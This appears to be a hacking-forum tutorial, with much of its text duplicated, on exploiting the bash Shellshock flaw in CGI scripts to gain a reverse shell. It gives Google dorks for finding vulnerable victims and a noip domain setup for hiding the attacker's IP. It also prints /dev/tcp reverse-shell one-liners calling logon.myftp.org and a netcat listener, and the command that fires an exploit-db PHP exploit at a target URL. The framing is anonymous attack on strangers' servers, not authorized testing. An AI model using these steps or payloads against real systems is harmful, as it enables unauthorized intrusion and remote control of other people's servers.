x32x01
ADMINISTRATOR
- by x32x01 ||
Today, we’re going to exploit a BASH Shellshock Vulnerability successfully and getting a reverse shell while protecting yourself and hiding your IP Address.
Who is vulnerable to shellshock?
CGI scripts using bash variables or commands and CGI scripts are written in bash can be exploited remotely. Moreover, any service listening on a port and using bash script or its variables in its coding can also be exploited using this vulnerability.
Requirements:
We can find our vulnerable victims using google dorks. Mostly, all CGI scripts written in bash uses a .sh file extension. So, following google dorks can give you good results.
Port Forwarding:
Open your router or USB modem settings and forward port 5555 for your LAN IP.
noip Domain for anonymity:
This step is optional and it just provides a little bit more anonymity in our penetration testing scenario.
1- Visit noip.com and register an account.
2- Now go in your account and go in Manager Hosts. There add a free domain name with your public IP.
This setting will take almost 1 minute to apply. After one minute you can ping your domain name and can verify that it is resolving to your public IP.
Now we will use any free domain name for our reverse shell.
/dev/tcp Linux Native Reverse Shell:
We will try to use the /dev/tcp for reverse shell because every linux system have it.
OR
NOTE: forward your port 5555 for your LAN IP otherwise it won’t work for you.
Verification of vulnerable victim:
Open CMD and go to the directory where you downloaded the exploit from exploit-db.
Now type the following command to run this exploit.
php bash_mod_cgi_script.php
It will show u an out saying that gives me URL and command.
So use the above-given URL of the victim and try to use any linux system command i.e. ls, whoami, etc.
If you see command sent to server then it means server is receiving our command but it can’t send back any response.
Netcat Reverse Shell Handler:
Now we need to run netcat listening on a port so that we may get a reverse shell.So, start a netcat listening on ur system with this command:
-vv is used for verbosity and more information
-l is for listening with netcat
-p is used for a custom port on which we want to listen
Now we are all set, just run the following command and wait untill you receive a reverse shell on your netcat reverse handler.
CGI scripts using bash variables or commands and CGI scripts are written in bash can be exploited remotely. Moreover, any service listening on a port and using bash script or its variables in its coding can also be exploited using this vulnerability.
Requirements:
- Shellshock vulnerable victim
- Router or USB modem having port forwarding Feature
- Download exploit for shellshock from here
- Netcat
- PHP
We can find our vulnerable victims using google dorks. Mostly, all CGI scripts written in bash uses a .sh file extension. So, following google dorks can give you good results.
Code:
inurl:/cgi-bin/ ext:sh
inurl:/cgi-bin/ ext:cgi
Port Forwarding:
Open your router or USB modem settings and forward port 5555 for your LAN IP.
noip Domain for anonymity:
This step is optional and it just provides a little bit more anonymity in our penetration testing scenario.
1- Visit noip.com and register an account.
2- Now go in your account and go in Manager Hosts. There add a free domain name with your public IP.
This setting will take almost 1 minute to apply. After one minute you can ping your domain name and can verify that it is resolving to your public IP.
Now we will use any free domain name for our reverse shell.
/dev/tcp Linux Native Reverse Shell:
We will try to use the /dev/tcp for reverse shell because every linux system have it.
Code:
/bin/bash -i >& /dev/tcp/logon.myftp.org/4444 0>&1
Code:
/bin/bash -i >& /dev/tcp/UR_PUBLIC_IP/5555 0>&1
Verification of vulnerable victim:
Open CMD and go to the directory where you downloaded the exploit from exploit-db.
Now type the following command to run this exploit.
php bash_mod_cgi_script.php
It will show u an out saying that gives me URL and command.
So use the above-given URL of the victim and try to use any linux system command i.e. ls, whoami, etc.
If you see command sent to server then it means server is receiving our command but it can’t send back any response.
Netcat Reverse Shell Handler:
Now we need to run netcat listening on a port so that we may get a reverse shell.So, start a netcat listening on ur system with this command:
Code:
nc -lp 4444 -vv
-l is for listening with netcat
-p is used for a custom port on which we want to listen
Now we are all set, just run the following command and wait untill you receive a reverse shell on your netcat reverse handler.
Code:
php bash_mod_cgi_script.php -u http://targetdomain.com/cgi-bin/wslb.sh -c “/bin/bash -i >& /dev/tcp/logon.myftp.org/5555 0>&1”